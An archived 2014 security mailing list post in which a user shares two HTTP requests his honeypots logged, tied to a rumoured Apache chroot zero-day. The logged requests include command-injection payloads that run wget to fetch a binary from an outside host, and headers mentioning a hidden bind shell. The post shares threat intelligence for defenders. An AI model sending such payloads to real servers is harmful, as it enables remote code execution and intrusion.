PaulDotCom mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [Security Weekly] apache chroot 0day?

From: Lutz Schildt <ls () lsmooth de>
Date: Tue, 29 Jul 2014 09:05:15 +0200
Am 28.07.2014 21:26, schrieb Lutz Schildt:
I've seen the same request on one of my honeypots and a second one a few hours later from the same IP:
GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget proxypipe.com/apach0day; 
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Another one:
GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget proxypipe.com/apach0day; 
HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail securityweekly com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
Previous By Date Next
Previous By Thread Next

Current thread: